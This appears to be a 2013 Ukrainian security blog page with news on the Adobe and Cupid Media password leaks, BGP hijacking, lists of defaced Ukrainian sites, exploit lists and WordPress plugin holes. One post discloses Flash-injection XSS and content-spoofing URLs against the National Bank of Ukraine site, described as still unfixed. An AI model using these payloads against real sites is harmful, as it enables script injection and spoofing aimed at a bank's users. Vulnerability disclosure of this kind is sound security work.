Новини: паролі користувачів Adobe, нова техніка MITM-атак та 42 млн. паролів

22:45 29.11.2013

За повідомленням www.xakep.ru, 130 000 000 паролів Adobe виклали у відкритий доступ і частково розшифрували.

У першому повідомленні про крадіжку паролів мільйонів своїх користувачів компанія Adobe сказала, що громадянам немає чого побоюватися, тому що паролі зашифровані.

Поки співтовариство не одержало базу з паролями, фраза про “зашифровані” паролі була незрозумілою. Можна було припустити, що Adobe мала на увазі хешування.

Але істина виявилася не такою радісною. Файл із 130 324 429 паролями незабаром потрапив у відкритий доступ, так що усі одержали можливість переконатися, як саме зашифровані паролі. Adobe використовувала симетричний блоковий шифр 3DES у режимі Electronic Code Book (ECB). При цьому з’ясувалося, що витік даних має безпрецедентний масштаб: мова йде зовсім не про 2,9 мільйонів паролів, як раніше стверджувала Adobe.

За повідомленням www.opennet.ru, виявлено техніку MITM-атак, засновану на підстановці фіктивних BGP-маршрутів.

Компанія Renesys, що спеціалізується на моніторингу роботи глобальної мережі, зафіксувала успішні спроби проведення атаки, спрямованої на перенапрямок потоків трафіка. Це може використовуватися для MITM-атак.

Атака організується через формування підставних BGP-маршрутів, що у сумі дозволяють вплинути на пріоритети вибору шляху проходження трафіка й організувати проходження потоку через підконтрольну територію. Наприклад, подібним чином може бути організоване перехоплення локального трафіка однієї країни спецслужбами іншої країни.

За повідомленням www.xakep.ru, взлом сайтів знайомств Cupid Media: 42 млн. паролів відкритим текстом.

Продовжується низка великих взломів з витоками мільйонів паролів. Слідом за Adobe така неприємність сталася з компанією Cupid Media, якій належить більше 30 нішевих сайтів знайомств у різних районах світу, у тому числі в Росії й Україні.

Раніше на сервері хакерів були знайдені вихідні тексти програм і зашифровані паролі 130 млн користувачів Adobe. Зараз виявився ще один цікавий файл, що містить 42 млн паролів Cupid Media відкритим текстом, із зазначенням адреси електронної пошти, імені, прізвища і дати народження кожного користувача.

Великі взломи персональних даних відбуваються регулярно: витоки були як в попередні роки, так і в цьому році. Витоки даних Adobe та Cupid Media будуть одними з найбільших в 2013 році.

Похакані сайти №247

20:12 29.11.2013

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://iitzo.gov.ua (хакером d3b~X) - 21.11.2013 - похаканий державний сайт, сторінка хакера все ще знаходиться на сайті
  • http://sez.crimea.ua (хакером S4L4M) - 06.08.2013, зараз сайт вже виправлений адмінами
  • http://stomadent.com.ua (хакерами з Iran Security Team) - 02.08.2013, зараз сайт вже виправлений адмінами
  • http://greenmix.com.ua (хакерами з Iran Security Team) - 04.08.2013, зараз сайт вже виправлений адмінами
  • http://sensei-school.com.ua (хакерами з Iran Security Team) - 12.08.2013, зараз сайт вже виправлений адмінами

Добірка уразливостей

17:27 29.11.2013

В даній добірці уразливості в веб додатках:

Нові уразливості на www.bank.gov.ua

23:59 28.11.2013

14.08.2013

У травні, 22.05.2013, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.bank.gov.ua - сайті Національного банку України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.bank.gov.ua. Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.blog.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.11.2013

XSS (через Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=http://site/1.swf

Content Spoofing (Content Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&pic=http://site/1.jpg

Content Spoofing (HTML Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site/1.jpg%27%3E

XSS:

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Дані уразливості досі не виправлені.

Третій масовий взлом сайтів на сервері Hetzner

22:41 28.11.2013

В період з 13.10.2012 по 02.12.2012 та з 15.01.2013 по 26.04.2013 відбувся третій масовий взлом сайтів на сервері Hetzner. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер німецької компанії Hetzner, на якому хостилися українські та російські сайти. Взлом складався з декількох дефейсів сайтів. Раніше я писав про другий масовий взлом сайтів на сервері Hetzner.

Всього було взломано 62 сайти на сервері компанії Hetzner (IP 5.9.7.9). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт kpdozvil.gov.ua. Це черговий державний сайт, що хоститься закордоном.

Якщо невеликі дефейси по одному або кілька сайтів явно були зроблені при взломах окремих сайтів, то стосовно дефейсу HighTech можна сказати, що враховуючи дефейс великої кількості сайтів за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

Численні уразливості в Google Chrome та Chromium

20:03 28.11.2013

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 31.0, Chromium 31.0.

Численні пошкодження пам’яті, підміна адреси, перехоплення TLS-з’єднання.

Добірка експлоітів

17:24 28.11.2013

В даній добірці експлоіти в веб додатках:

  • Pirelli Discus DRG A125g - Local Password Disclosure Vulnerability (деталі)
  • Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability (деталі)
  • vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution (деталі)
  • NAS4Free Arbitrary Remote Code Execution Vulnerability (деталі)
  • Beetel Connection Manager NetConfig.ini Buffer Overflow Vulnerability (деталі)

Уразливості в плагінах для WordPress №126

23:53 27.11.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cart66, Finalist та Dexs PM System. Для котрих з’явилися експлоіти. Cart66 - це е-комерс плагін для додання кошика покупця, Finalist - це плагін, Dexs PM System - це плагін.

  • WordPress Cart66 1.5.1.14 Cross Site Request Forgery / Cross Site Scripting (деталі)
  • WordPress Finalist Cross Site Scripting (деталі)
  • WordPress Dexs PM System Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виконання коду в Internet Explorer

22:40 27.11.2013

Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Mozilla Firefox, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

CVE-2012-4792 Microsoft Internet Explorer CButton Vulnerability Metasploit Demo

В даному відео ролику демонструється віддалене виконання коду в Internet Explorer версій 6, 7 і 8. Використовується експлоіт для проведення атаки на уразливість в Internet Explorer (показано на прикладі IE8) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Обхід захисту в nginx

20:05 27.11.2013

Виявлена можливість обходу захисту в nginx.

Уразливі версії: nginx 1.4, nginx 1.5.

Можна обійти обмеження доступу за допомогою пробілу та нульового байта. Про дану атаку раніше я писав в своїй статті.